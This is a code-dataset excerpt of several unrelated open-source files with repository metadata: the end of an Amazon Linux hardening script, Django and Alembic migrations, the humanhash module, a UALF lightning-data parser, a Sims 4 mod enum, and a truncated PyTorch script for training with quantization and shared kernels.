'cat /etc/profile | sed -E "s/{}/\\1umask 027\\2/g"'.format(
umask_reg)
])
File('/etc/profile').write(profile)
def configure_su():
"""5.5 Ensure access to the su command is restricted"""
File('/etc/pam.d/su').write(get_string_asset('/etc/pam.d/su'))
exec_shell('usermod -aG wheel root')
def main():
parser = argparse.ArgumentParser(
description='A script to harden Amazon Linux instance.')
# The Amazon Time Sync Service is available through NTP
# at the 169.254.169.123 IP address for any instance running in a VPC.
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/set-time.html
parser.add_argument('--time', metavar='<time server>', default ='169.254.169.123',
help='Specify the upstream time server.')
parser.add_argument('--chrony', action='store', type=bool, default=True,
help='Use chrony for time synchronization')
parser.add_argument('--no-backup', action='store_true',
help='Automatic config backup is disabled')
parser.add_argument('--clients', nargs='+', metavar='<allowed clients>',
help='Specify a comma separated list of hostnames and host IP addresses.')
parser.add_argument('-v', '--verbose', action='store_true',
help='Display details including debugging output etc.')
parser.add_argument('--disable-tcp-wrappers', action='store_true',
help='disable tcp-wrappers')
parser.add_argument('--disable-pam', action='store_true',
help='disable pam')
parser.add_argument('--disable-iptables', action='store_true',
help='disable iptables')
parser.add_argument('--disable-mount-options', action='store_true',
help='disable set mount options')
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.WARN)
logging.info(
'[Config] Upstream time server is set as "%s"', args.time)
if args.chrony:
logging.info(
'[Config] chrony will be used for time synchronization')
else:
logging.info(
'[Config] ntp will be used for time synchronization')
if args.clients:
logging.info('[Config] Allowed clients are set as %s',
args.clients)
if args.no_backup:
logging.info('[Config] Automatic config backup is disabled')
set_backup_enabled(False)
# 1 Initial Setup
disable_unused_filesystems()
if not args.disable_mount_options:
pass
#set_mount_options()
ensure_sticky_bit()
disable_automounting()
enable_aide()
secure_boot_settings()
apply_process_hardenings()
configure_warning_banners()
ensure_updated()
# 2 Services
disable_inetd_services()
configure_time_synchronization(args.time, chrony=args.chrony)
remove_x11_packages()
disable_special_services()
configure_mta()
remove_insecure_clients()
# 3 Network Configuration
configure_host_network_params()
configure_network_params()
configure_ipv6_params()
if not args.disable_tcp_wrappers:
pass
#configure_tcp_wrappers(args.clients)
disable_uncommon_protocols()
if not args.disable_iptables:
pass
#configure_iptables()
# 4 Logging and Auditing
configure_rsyslog()
configure_log_file_permissions()
# 5 Access, Authentication and Authorization
configure_cron()
configure_sshd()
if not args.disable_pam:
pass
#configure_pam()
configure_password_parmas()
configure_umask()
#configure_su()
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | noreply@github.com |
4057486e70b78cb4a5a51e88d6e9c8052b98fd00 | 54bc49797f827d51382efeb57945ba8b48d495e7 | /core/migrations/0021_coupon_amount.py | ff8490ec168d799d126f33f823edd6173f0b1d0a | [] | no_license | samarth1771/ecommerce | 3b9fa8662a29c6d44102738d748218aa72f32f0c | 94b5e72829f7901dc3e13b61a08da52f2afb40fc | refs/heads/master | 2022-12-24T01:23:57.720059 | 2020-09-25T05:12:07 | 2020-09-25T05:12:07 | 298,473,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 384 | py | # Generated by Django 2.2.3 on 2020-09-24 13:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0020_order_coupon'),
]
operations = [
migrations.AddField(
model_name='coupon',
name='amount',
field=models.FloatField(blank=True, null=True),
),
]
| [
"samarthpatel71@gmail.com"
] | samarthpatel71@gmail.com |
4b32abb8482edd3df05ec1cdbb77ec59595f0fc4 | 917763caec8661aaa223a9928e844c504e9175e5 | /humanhash.py | 90e01e699035416eb07e11c757bb64e8ea1ccf9e | [] | no_license | shabda/humanhash-coffeescript | c17f25b05ed3299a658a66847138fcedd95dec75 | 628d6b62964d707d85d7c1eb4718af144706b8e0 | refs/heads/master | 2016-08-03T03:11:23.270378 | 2011-12-13T05:51:44 | 2011-12-13T05:51:44 | 2,970,011 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,194 | py | """
humanhash: Human-readable representations of digests.
The simplest ways to use this module are the :func:`humanize` and :func:`uuid`
functions. For tighter control over the output, see :class:`HumanHasher`.
"""
import operator
import uuid as uuidlib
DEFAULT_WORDLIST = (
'ack', 'alabama', 'alanine', 'alaska', 'alpha', 'angel', 'apart', 'april',
'arizona', 'arkansas', 'artist', 'asparagus', 'aspen', 'august', 'autumn',
'avocado', 'bacon', 'bakerloo', 'batman', 'beer', 'berlin', 'beryllium',
'black', 'blossom', 'blue', 'bluebird', 'bravo', 'bulldog', 'burger',
'butter', 'california', 'carbon', 'cardinal', 'carolina', 'carpet', 'cat',
'ceiling', 'charlie', 'chicken', 'coffee', 'cola', 'cold', 'colorado',
'comet', 'connecticut', 'crazy', 'cup', 'dakota', 'december', 'delaware',
'delta', 'diet', 'don', 'double', 'early', 'earth', 'east', 'echo',
'edward', 'eight', 'eighteen', 'eleven', 'emma', 'enemy', 'equal',
'failed', 'fanta', 'fifteen', 'fillet', 'finch', 'fish', 'five', 'fix',
'floor', 'florida', 'football', 'four', 'fourteen', 'foxtrot', 'freddie',
'friend', 'fruit', 'gee', 'georgia', 'glucose', 'golf', 'green', 'grey',
'hamper', 'happy', 'harry', 'hawaii', 'helium', 'high', 'hot', 'hotel',
'hydrogen', 'idaho', 'illinois', 'india', 'indigo', 'ink', 'iowa',
'island', 'item', 'jersey', 'jig', 'johnny', 'juliet', 'july', 'jupiter',
'kansas', 'kentucky', 'kilo', 'king', 'kitten', 'lactose', 'lake', 'lamp',
'lemon', 'leopard', 'lima', 'lion', 'lithium', 'london', 'louisiana',
'low', 'magazine', 'magnesium', 'maine', 'mango', 'march', 'mars',
'maryland', 'massachusetts', 'may', 'mexico', 'michigan', 'mike',
'minnesota', 'mirror', 'mississippi', 'missouri', 'mobile', 'mockingbird',
'monkey', 'montana', 'moon', 'mountain', 'muppet', 'music', 'nebraska',
'neptune', 'network', 'nevada', 'nine', 'nineteen', 'nitrogen', 'north',
'november', 'nuts', 'october', 'ohio', 'oklahoma', 'one', 'orange',
'oranges', 'oregon', 'oscar', 'oven', 'oxygen', 'papa', 'paris', 'pasta',
'pennsylvania', 'pip', 'pizza', 'pluto', 'potato', 'princess', 'purple',
'quebec', 'queen', 'quiet', 'red', 'river', 'robert', 'robin', 'romeo',
'rugby', 'sad', 'salami', 'saturn', 'september', 'seven', 'seventeen',
'shade', 'sierra', 'single', 'sink', 'six', 'sixteen', 'skylark', 'snake',
'social', 'sodium', 'solar', 'south', 'spaghetti', 'speaker', 'spring',
'stairway', 'steak', 'stream', 'summer', 'sweet', 'table', 'tango', 'ten',
'tennessee', 'tennis', 'texas', 'thirteen', 'three', 'timing', 'triple',
'twelve', 'twenty', 'two', 'uncle', 'undress', 'uniform', 'uranus', 'utah',
'vegan', 'venus', 'vermont', 'victor', 'video', 'violet', 'virginia',
'washington', 'west', 'whiskey', 'white', 'william', 'winner', 'winter',
'wisconsin', 'wolfram', 'wyoming', 'xray', 'yankee', 'yellow', 'zebra',
'zulu')
class HumanHasher(object):
"""
Transforms hex digests to human-readable strings.
The format of these strings will look something like:
`victor-bacon-zulu-lima`. The output is obtained by compressing the input
digest to a fixed number of bytes, then mapping those bytes to one of 256
words. A default wordlist is provided, but you can override this if you
prefer.
As long as you use the same wordlist, the output will be consistent (i.e.
the same digest will always render the same representation).
"""
def __init__(self, wordlist=DEFAULT_WORDLIST):
if len(wordlist) != 256:
raise ArgumentError("Wordlist must have exactly 256 items")
self.wordlist = wordlist
def humanize(self, hexdigest, words=4, separator='-'):
"""
Humanize a given hexadecimal digest.
Change the number of words output by specifying `words`. Change the
word separator with `separator`.
>>> digest = '60ad8d0d871b6095808297'
>>> HumanHasher().humanize(digest)
'sodium-magnesium-nineteen-hydrogen'
"""
# Gets a list of byte values between 0-255.
bytes = map(lambda x: int(x, 16),
map(''.join, zip(hexdigest[::2], hexdigest[1::2])))
# Compress an arbitrary number of bytes to `words`.
compressed = self.compress(bytes, words)
# Map the compressed byte values through the word list.
return separator.join(self.wordlist[byte] for byte in compressed)
@staticmethod
def compress(bytes, target):
"""
Compress a list of byte values to a fixed target length.
>>> bytes = [96, 173, 141, 13, 135, 27, 96, 149, 128, 130, 151]
>>> HumanHasher.compress(bytes, 4)
[205, 128, 156, 96]
Attempting to compress a smaller number of bytes to a larger number is
an error:
>>> HumanHasher.compress(bytes, 15) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: Fewer input bytes than requested output
"""
length = len(bytes)
if target > length:
raise ValueError("Fewer input bytes than requested output")
# Split `bytes` into `target` segments.
seg_size = length // target
segments = [bytes[i * seg_size:(i + 1) * seg_size]
for i in xrange(target)]
# Catch any left-over bytes in the last segment.
segments[-1].extend(bytes[target * seg_size:])
# Use a simple XOR checksum-like function for compression.
checksum = lambda bytes: reduce(operator.xor, bytes, 0)
checksums = map(checksum, segments)
return checksums
def uuid(self, **params):
"""
Generate a UUID with a human-readable representation.
Returns `(human_repr, full_digest)`. Accepts the same keyword arguments
as :meth:`humanize` (they'll be passed straight through).
"""
digest = str(uuidlib.uuid4()).replace('-', '')
return self.humanize(digest, **params), digest
DEFAULT_HASHER = HumanHasher()
uuid = DEFAULT_HASHER.uuid
humanize = DEFAULT_HASHER.humanize | [
"shabda@agiliq.com"
] | shabda@agiliq.com |
8a21fce1e50a4aee7f479ffad6660a64753cc79c | 5df0d9ac4ffcce7465de0037da26c76c95b4c0d0 | /ualf/ualf.py | c6e194e229d3c8819f480a3c537e6060e2361938 | [
"MIT"
] | permissive | auwalsoe/ualf_parser | f3d4acf805c58271a389e300ff891deb3cbb5cf7 | b7e6c649b8eb0a9766f44837cb34236625194e36 | refs/heads/master | 2020-03-19T05:33:56.016790 | 2020-02-15T17:31:26 | 2020-02-15T17:31:26 | 135,944,135 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,166 | py | '''UALF data parsing class'''
class Ualf:
def __init__(self, ualf_coordinates):
self.read_ualf(ualf_coordinates)
def read_ualf(self, ualf_coordinates):
ualf_coordinates = list(ualf_coordinates)
self.version = int(ualf_coordinates[0])
self.year = int(''.join(ualf_coordinates[2:6]))
self.month = int(''.join(ualf_coordinates[7:10]))
self.day = int(''.join(ualf_coordinates[10:13]))
self.hour = int(''.join(ualf_coordinates[13:15]))
self.minutes = int(''.join(ualf_coordinates[15:18]))
self.seconds = int(''.join(ualf_coordinates[18:21]))
self.nanoseconds = int(''.join(ualf_coordinates[21:31]))
self.latitude = float(''.join(ualf_coordinates[31:39]))
self.longitude = float(''.join(ualf_coordinates[39:47]))
self.peak_current = int(''.join(ualf_coordinates[47:51]))
self.multiplicity = int(''.join(ualf_coordinates[51:53]))
self.number_of_sensors = int(''.join(ualf_coordinates[53:56]))
self.degrees_of_freedom = int(''.join(ualf_coordinates[56:59]))
self.ellipse_angle = float(''.join(ualf_coordinates[59:66]))
self.semi_major_axis = float(''.join(ualf_coordinates[66:71]))
self.semi_minor_axis = float(''.join(ualf_coordinates[71:75]))
self.chi_square_value = float(''.join(ualf_coordinates[76:81]))
self.rise_time = float(''.join(ualf_coordinates[81:86]))
self.peak_to_zero_time = float(''.join(ualf_coordinates[86:91]))
self.max_rate_of_rise = float(''.join(ualf_coordinates[91:96]))
self.cloud_indicator = int(''.join(ualf_coordinates[96:98]))
self.angle_indicator = int(''.join(ualf_coordinates[98:100]))
self.signal_indicator = int(''.join(ualf_coordinates[100:102]))
self.timing_indicator = int(''.join(ualf_coordinates[102:104]))
self.ualf_dict = self.make_ualf_dict()
def make_ualf_dict(self):
ualf_dict = {
"version" : self.version,
"year" : self.year,
"month" : self.month,
"day" : self.day,
"hour" : self.hour,
"minutes" : self.minutes,
"seconds" : self.seconds,
"nanoseconds" : self.nanoseconds,
"latitude" : self.latitude,
"longitude" : self.longitude,
"peak_current" : self.peak_current,
"multiplicity" : self.multiplicity,
"number_of_sensors" : self.number_of_sensors,
"degrees_of_freedom" : self.degrees_of_freedom,
"semi_major_axis" : self.semi_major_axis,
"semi_minor_axis" : self.semi_minor_axis,
"chi_square_value" : self.chi_square_value,
"rise_time" : self.rise_time,
"peak_to_zero_time" : self.peak_to_zero_time,
"max_rate_of_rise" : self.max_rate_of_rise,
"cloud_indicator" : self.cloud_indicator,
"signal_indicator" : self.signal_indicator,
"timing_indicator" : self.timing_indicator}
return ualf_dict
def parse(self):
return self.ualf_dict
def print_ualf(self):
print(self.ualf_dict)
| [
"auwalsoe@gmail.com"
] | auwalsoe@gmail.com |
cc0c3f49a86cd19e0eac92eb6d9d45901dc5447e | fb5c5d50d87a6861393d31911b9fae39bdc3cc62 | /Scripts/sims4communitylib/enums/common_funds_sources.py | b752318a7a87e9b2ab9fbcb9e237f428646c1ce1 | [
"CC-BY-4.0"
] | permissive | ColonolNutty/Sims4CommunityLibrary | ee26126375f2f59e5567b72f6eb4fe9737a61df3 | 58e7beb30b9c818b294d35abd2436a0192cd3e82 | refs/heads/master | 2023-08-31T06:04:09.223005 | 2023-08-22T19:57:42 | 2023-08-22T19:57:42 | 205,197,959 | 183 | 38 | null | 2023-05-28T16:17:53 | 2019-08-29T15:48:35 | Python | UTF-8 | Python | false | false | 2,552 | py | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Dict
from sims.funds import FundsSource
from sims4communitylib.enums.enumtypes.common_int import CommonInt
class CommonFundsSource(CommonInt):
"""Sources of funds."""
HOUSEHOLD: 'CommonFundsSource' = ...
RETAIL: 'CommonFundsSource' = ...
BUSINESS: 'CommonFundsSource' = ...
STATISTIC: 'CommonFundsSource' = ...
BUCKS: 'CommonFundsSource' = ...
NO_SOURCE: 'CommonFundsSource' = ...
@staticmethod
def convert_to_vanilla(value: 'CommonFundsSource') -> FundsSource:
"""convert_to_vanilla(value)
Convert a value into the vanilla FundsSource enum.
:param value: An instance of the enum.
:type value: CommonFundsSource
:return: The specified value translated to FundsSource or HOUSEHOLD if the value could not be translated.
:rtype: Union[FundsSource, None]
"""
mapping: Dict[CommonFundsSource, FundsSource] = {
CommonFundsSource.HOUSEHOLD: FundsSource.HOUSEHOLD,
CommonFundsSource.RETAIL: FundsSource.RETAIL,
CommonFundsSource.BUSINESS: FundsSource.BUSINESS,
CommonFundsSource.STATISTIC: FundsSource.STATISTIC,
CommonFundsSource.BUCKS: FundsSource.BUCKS,
CommonFundsSource.NO_SOURCE: FundsSource.NO_SOURCE,
}
return mapping.get(value, FundsSource.HOUSEHOLD)
@staticmethod
def convert_from_vanilla(value: FundsSource) -> 'CommonFundsSource':
"""convert_from_vanilla(value)
Convert a vanilla FundsSource to value.
:param value: An instance of the enum.
:type value: FundsSource
:return: The specified value translated to CommonFundsSource or HOUSEHOLD if the value could not be translated.
:rtype: CommonFundsSource
"""
mapping: Dict[FundsSource, CommonFundsSource] = {
FundsSource.HOUSEHOLD: CommonFundsSource.HOUSEHOLD,
FundsSource.RETAIL: CommonFundsSource.RETAIL,
FundsSource.BUSINESS: CommonFundsSource.BUSINESS,
FundsSource.STATISTIC: CommonFundsSource.STATISTIC,
FundsSource.BUCKS: CommonFundsSource.BUCKS,
FundsSource.NO_SOURCE: CommonFundsSource.NO_SOURCE,
}
return mapping.get(value, CommonFundsSource.HOUSEHOLD)
| [
"ColonolNutty@hotmail.com"
] | ColonolNutty@hotmail.com |
f2f46024e6515ff95aa1fe7addebe8370c56a73e | 85fd399e0cf9997028e5d30aed85cf20cf476cb5 | /mlrun/api/migrations/versions/d781f58f607f_tag_object_name_string.py | ad89d4e7c0c1c9318e5a19460cccad34d34aa342 | [
"Apache-2.0"
] | permissive | omarirfa/mlrun | deb9c63ec8bb50f80e3e77d042fde1ddb52d5284 | 6336baf610bc67997c60be4ad7c32b4ea7d94d49 | refs/heads/master | 2023-08-13T19:14:43.362103 | 2021-09-22T09:59:58 | 2021-09-22T09:59:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,166 | py | """tag object name string
Revision ID: d781f58f607f
Revises: e1dd5983c06b
Create Date: 2021-07-29 16:06:45.555323
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "d781f58f607f"
down_revision = "deac06871ace"
branch_labels = None
depends_on = None
def upgrade():
with op.batch_alter_table("feature_sets_tags") as batch_op:
batch_op.alter_column(column_name="obj_name", type_=sa.String())
with op.batch_alter_table("feature_vectors_tags") as batch_op:
batch_op.alter_column(column_name="obj_name", type_=sa.String())
with op.batch_alter_table("functions_tags") as batch_op:
batch_op.alter_column(column_name="obj_name", type_=sa.String())
def downgrade():
with op.batch_alter_table("functions_tags") as batch_op:
batch_op.alter_column(column_name="obj_name", type_=sa.Integer())
with op.batch_alter_table("feature_vectors_tags") as batch_op:
batch_op.alter_column(column_name="obj_name", type_=sa.Integer())
with op.batch_alter_table("feature_sets_tags") as batch_op:
batch_op.alter_column(column_name="obj_name", type_=sa.Integer())
| [
"noreply@github.com"
] | noreply@github.com |
6f0d14d9a72dd011c196fe8d61e322a505a18730 | 6f795b6e7d92678f66ace97ec48a0790467347c3 | /Primitive.py | 4d03494830b16735894f93fffc8216530ddd9859 | [] | no_license | zshimanchik/primitive-reflexes | 7164be7396d21fdbdf822dafe044aa670385303d | bcabd5160b4a8a1c9e9e072e1d83f6ba29330ef7 | refs/heads/master | 2020-04-05T22:48:06.898392 | 2015-08-16T13:07:12 | 2015-08-16T13:07:12 | 37,374,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,594 | py | __author__ = 'zshimanchik'
import math
from NeuralNetwork.NeuralNetwork import NeuralNetwork
class Primitive():
DEBUG = True
MIN_BRAIN_STIMULATION = 0.04
MAX_BRAIN_STIMULATION = 0.1
BRAIN_STIMULATION_FILTER_THRESHOLD = 0.3
RANDOM_VALUE_FOR_ANSWER = 0.1
def __init__(self):
self.x = 89
self.y = 120
self.size = 30
self.sensor_count = 16
self.sensor_values = []
self.state = 0
self.stimulation = 0
self.prev_influence = 0
self.brain_stimulation = 0
self.idle_time = 0
self.random_plan = []
self.first_state = True
self.brain = NeuralNetwork([self.sensor_count * 3, 18, 3], random_value=self.RANDOM_VALUE_FOR_ANSWER)
# self.brain = NetworkTest.make_net(self.sensor_count)
def sensors_positions(self):
res = []
for i in range(self.sensor_count):
angle = i * math.pi * 2 / self.sensor_count
res.append((math.cos(angle) * self.size + self.x, math.sin(angle) * self.size + self.y))
return res
def update(self, sensors_values):
self.sensor_values = zip(sensors_values[::3], sensors_values[1::3], sensors_values[2::3])
answer = self.brain.calculate(sensors_values)
if self.DEBUG:
print("answ={:.6f}, {:.6f}, {:.6f} inp={}".format(answer[0], answer[1], answer[2], self.sensor_values))
self.move(answer[0], answer[1])
self.grow_up(answer[2])
def change_state(self, influence_value):
self.state += influence_value
self.state = max(self.state, -1.0)
self.state = min(self.state, 1.0)
self.stimulation = influence_value - self.prev_influence
self.prev_influence = influence_value
if self.DEBUG:
print("stimulation={:.6f}".format(self.stimulation))
if self.first_state:
self.first_state=False
return
# sign of self.stimulation
sign = (self.stimulation > 0) - (self.stimulation < 0)
abs_stimulation = abs(self.stimulation)
self.brain_stimulation = (abs_stimulation < Primitive.BRAIN_STIMULATION_FILTER_THRESHOLD) * sign \
* min(max(Primitive.MIN_BRAIN_STIMULATION, abs_stimulation), Primitive.MAX_BRAIN_STIMULATION)
self.brain.teach_considering_random(self.brain_stimulation)
def move(self, dx, dy):
self.x += dx
self.y += dy
def grow_up(self, d_size):
self.size += d_size
self.size = max(self.size, 14)
self.size = min(self.size, 40)
| [
"zahar.shamanchik@gmail.com"
] | zahar.shamanchik@gmail.com |
43eaf19862f81f19ed856901ec0e25148584096e | 44471e1b64165c760c27cb934ff8800eb0e64ebd | /profile_test.py | aab9415d74a439c41b377cece1e796b3e5fdcd1d | [
"MIT"
] | permissive | mlvc-lab/ILKP | 93db8ada28d411a4cf4a9ebdb25b65a9da0cd6ec | d9c05223f742167c8dd6543a3276fde08b7986ff | refs/heads/master | 2023-07-23T22:18:41.678177 | 2021-09-05T05:14:06 | 2021-09-05T05:14:06 | 403,219,642 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 19,461 | py | import time
import pathlib
from os.path import isfile
import numpy as np
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.optim as optim
import torch.backends.cudnn as cudnn
import torch.autograd.profiler as profiler
import models
import config
from utils import *
from data import DataLoader
from find_similar_kernel import find_kernel, find_kernel_pw
from quantize import quantize, quantize_ab
# for ignore imagenet PIL EXIF UserWarning
import warnings
warnings.filterwarnings("ignore", "(Possibly )?corrupt EXIF data", UserWarning)
# for sacred logging
from sacred import Experiment
from sacred.observers import MongoObserver
# sacred experiment
ex = Experiment('WP_MESS')
ex.observers.append(MongoObserver.create(url=config.MONGO_URI,
db_name=config.MONGO_DB))
@ex.config
def hyperparam():
"""
sacred exmperiment hyperparams
:return:
"""
args = config.config()
@ex.main
def main(args):
global arch_name
opt = args
if opt.cuda and not torch.cuda.is_available():
raise Exception('No GPU found, please run without --cuda')
# set model name
arch_name = set_arch_name(opt)
# logging at sacred
ex.log_scalar('architecture', arch_name)
ex.log_scalar('dataset', opt.dataset)
print('\n=> creating model \'{}\''.format(arch_name))
model = models.__dict__[opt.arch](data=opt.dataset, num_layers=opt.layers,
width_mult=opt.width_mult, batch_norm=opt.bn,
drop_rate=opt.drop_rate)
if model is None:
print('==> unavailable model parameters!! exit...\n')
exit()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=opt.lr,
momentum=opt.momentum, weight_decay=opt.weight_decay,
nesterov=True)
start_epoch = 0
n_retrain = 0
if opt.cuda:
torch.cuda.set_device(opt.gpuids[0])
with torch.cuda.device(opt.gpuids[0]):
model = model.cuda()
criterion = criterion.cuda()
model = nn.DataParallel(model, device_ids=opt.gpuids,
output_device=opt.gpuids[0])
cudnn.benchmark = True
# checkpoint file
ckpt_dir = pathlib.Path('checkpoint')
ckpt_file = ckpt_dir / arch_name / opt.dataset / opt.ckpt
# for resuming training
if opt.resume:
if isfile(ckpt_file):
print('==> Loading Checkpoint \'{}\''.format(opt.ckpt))
checkpoint = load_model(model, ckpt_file,
main_gpu=opt.gpuids[0], use_cuda=opt.cuda)
start_epoch = checkpoint['epoch']
optimizer.load_state_dict(checkpoint['optimizer'])
print('==> Loaded Checkpoint \'{}\' (epoch {})'.format(
opt.ckpt, start_epoch))
else:
print('==> no checkpoint found \'{}\''.format(
opt.ckpt))
exit()
# Data loading
print('==> Load data..')
start_time = time.time()
train_loader, val_loader = DataLoader(opt.batch_size, opt.workers,
opt.dataset, opt.datapath,
opt.cuda)
elapsed_time = time.time() - start_time
print('===> Data loading time: {:,}m {:.2f}s'.format(
int(elapsed_time//60), elapsed_time%60))
print('===> Data loaded..')
# for evaluation
if opt.evaluate:
if isfile(ckpt_file):
print('==> Loading Checkpoint \'{}\''.format(opt.ckpt))
checkpoint = load_model(model, ckpt_file,
main_gpu=opt.gpuids[0], use_cuda=opt.cuda)
epoch = checkpoint['epoch']
# logging at sacred
ex.log_scalar('best_epoch', epoch)
if opt.new:
# logging at sacred
ex.log_scalar('version', checkpoint['version'])
if checkpoint['version'] in ['v2q', 'v2qq', 'v2f']:
ex.log_scalar('epsilon', opt.epsilon)
print('===> Change indices to weights..')
idxtoweight(opt, model, checkpoint['idx'], checkpoint['version'])
print('==> Loaded Checkpoint \'{}\' (epoch {})'.format(
opt.ckpt, epoch))
# evaluate on validation set
print('\n===> [ Evaluation ]')
start_time = time.time()
acc1, acc5 = validate(opt, val_loader, None, model, criterion)
elapsed_time = time.time() - start_time
acc1 = round(acc1.item(), 4)
acc5 = round(acc5.item(), 4)
ckpt_name = '{}-{}-{}'.format(arch_name, opt.dataset, opt.ckpt[:-4])
save_eval([ckpt_name, acc1, acc5])
print('====> {:.2f} seconds to evaluate this model\n'.format(
elapsed_time))
return acc1
else:
print('==> no checkpoint found \'{}\''.format(
opt.ckpt))
exit()
# for retraining
if opt.retrain:
if isfile(ckpt_file):
print('==> Loading Checkpoint \'{}\''.format(opt.ckpt))
checkpoint = load_model(model, ckpt_file,
main_gpu=opt.gpuids[0], use_cuda=opt.cuda)
try:
n_retrain = checkpoint['n_retrain'] + 1
except:
n_retrain = 1
# logging at sacred
ex.log_scalar('n_retrain', n_retrain)
if opt.new:
if opt.version != checkpoint['version']:
print('version argument is different with saved checkpoint version!!')
exit()
# logging at sacred
ex.log_scalar('version', checkpoint['version'])
if checkpoint['version'] in ['v2q', 'v2qq', 'v2f']:
ex.log_scalar('epsilon', opt.epsilon)
print('===> Change indices to weights..')
idxtoweight(opt, model, checkpoint['idx'], opt.version)
print('==> Loaded Checkpoint \'{}\' (epoch {})'.format(
opt.ckpt, checkpoint['epoch']))
else:
print('==> no checkpoint found \'{}\''.format(
opt.ckpt))
exit()
# train...
best_acc1 = 0.0
train_time = 0.0
validate_time = 0.0
extra_time = 0.0
for epoch in range(start_epoch, opt.epochs):
adjust_learning_rate(optimizer, epoch, opt)
train_info = '\n==> {}/{} '.format(arch_name, opt.dataset)
if opt.new:
train_info += 'new_{} '.format(opt.version)
if opt.version in ['v2q', 'v2qq', 'v2f']:
train_info += 'a{}b{}bit '.format(opt.quant_bit_a, opt.quant_bit_b)
elif opt.version in ['v2qnb', 'v2qqnb']:
train_info += 'a{}bit '.format(opt.quant_bit_a)
if opt.version in ['v2qq', 'v2f', 'v2qqnb']:
train_info += 'w{}bit '.format(opt.quant_bit)
else:
if opt.quant:
train_info += '{}bit '.format(opt.quant_bit)
if opt.retrain:
train_info += '{}-th re'.format(n_retrain)
train_info += 'training'
if opt.new:
train_info += '\n==> Version: {} '.format(opt.version)
if opt.tv_loss:
train_info += 'with TV loss '
train_info += '/ SaveEpoch: {}'.format(opt.save_epoch)
if epoch < opt.warmup_epoch and opt.version.find('v2') != -1:
train_info += '\n==> V2 Warmup epochs up to {} epochs'.format(
opt.warmup_epoch)
train_info += '\n==> Epoch: {}, lr = {}'.format(
epoch, optimizer.param_groups[0]["lr"])
print(train_info)
# train for one epoch
print('===> [ Training ]')
start_time = time.time()
acc1_train, acc5_train = train(opt, train_loader,
epoch=epoch, model=model,
criterion=criterion, optimizer=optimizer)
elapsed_time = time.time() - start_time
train_time += elapsed_time
print('====> {:.2f} seconds to train this epoch\n'.format(
elapsed_time))
start_time = time.time()
if opt.new:
if opt.version in ['v2qq', 'v2f', 'v2qqnb']:
print('==> {}bit Quantization...'.format(opt.quant_bit))
quantize(model, opt, opt.quant_bit)
if arch_name in hasPWConvArchs:
quantize(model, opt, opt.quant_bit, is_pw=True)
if epoch < opt.warmup_epoch:
pass
elif (epoch-opt.warmup_epoch+1) % opt.save_epoch == 0: # every 'opt.save_epoch' epochs
print('===> Change kernels using {}'.format(opt.version))
indices = find_similar_kernel_n_change(opt, model, opt.version)
if opt.chk_save:
print('====> Save index and kernel for analysis')
save_index_n_kernel(opt, arch_name, epoch, model, indices, n_retrain)
else:
if opt.quant:
print('==> {}bit Quantization...'.format(opt.quant_bit))
quantize(model, opt, opt.quant_bit)
if arch_name in hasPWConvArchs:
print('==> {}bit pwconv Quantization...'.format(opt.quant_bit))
quantize(model, opt, opt.quant_bit, is_pw=True)
elapsed_time = time.time() - start_time
extra_time += elapsed_time
print('====> {:.2f} seconds for extra time this epoch\n'.format(
elapsed_time))
# evaluate on validation set
print('===> [ Validation ]')
start_time = time.time()
acc1_valid, acc5_valid = validate(opt, val_loader, epoch, model, criterion)
elapsed_time = time.time() - start_time
validate_time += elapsed_time
print('====> {:.2f} seconds to validate this epoch\n'.format(
elapsed_time))
acc1_train = round(acc1_train.item(), 4)
acc5_train = round(acc5_train.item(), 4)
acc1_valid = round(acc1_valid.item(), 4)
acc5_valid = round(acc5_valid.item(), 4)
# remember best Acc@1 and save checkpoint and summary csv file
state = {'epoch': epoch + 1,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'n_retrain': n_retrain}
summary = [epoch, acc1_train, acc5_train, acc1_valid, acc5_valid]
if not opt.new:
state['new'] = False
state['version'] = ''
state['idx'] = []
is_best = acc1_valid > best_acc1
best_acc1 = max(acc1_valid, best_acc1)
save_model(arch_name, state, epoch, is_best, opt, n_retrain)
save_summary(arch_name, summary, opt, n_retrain)
else:
if epoch < opt.warmup_epoch:
pass
elif (epoch-opt.warmup_epoch+1) % opt.save_epoch == 0: # every 'opt.save_epoch' epochs
state['new'] = True
state['version'] = opt.version
state['idx'] = indices
is_best = acc1_valid > best_acc1
best_acc1 = max(acc1_valid, best_acc1)
save_model(arch_name, state, epoch, is_best, opt, n_retrain)
save_summary(arch_name, summary, opt, n_retrain)
# calculate time
avg_train_time = train_time / (opt.epochs - start_epoch)
avg_valid_time = validate_time / (opt.epochs - start_epoch)
avg_extra_time = extra_time / (opt.epochs - start_epoch)
total_train_time = train_time + validate_time + extra_time
print('====> average training time each epoch: {:,}m {:.2f}s'.format(
int(avg_train_time//60), avg_train_time%60))
print('====> average validation time each epoch: {:,}m {:.2f}s'.format(
int(avg_valid_time//60), avg_valid_time%60))
print('====> average extra time each epoch: {:,}m {:.2f}s'.format(
int(avg_extra_time//60), avg_extra_time%60))
print('====> training time: {}h {}m {:.2f}s'.format(
int(train_time//3600), int((train_time%3600)//60), train_time%60))
print('====> validation time: {}h {}m {:.2f}s'.format(
int(validate_time//3600), int((validate_time%3600)//60), validate_time%60))
print('====> extra time: {}h {}m {:.2f}s'.format(
int(extra_time//3600), int((extra_time%3600)//60), extra_time%60))
print('====> total training time: {}h {}m {:.2f}s'.format(
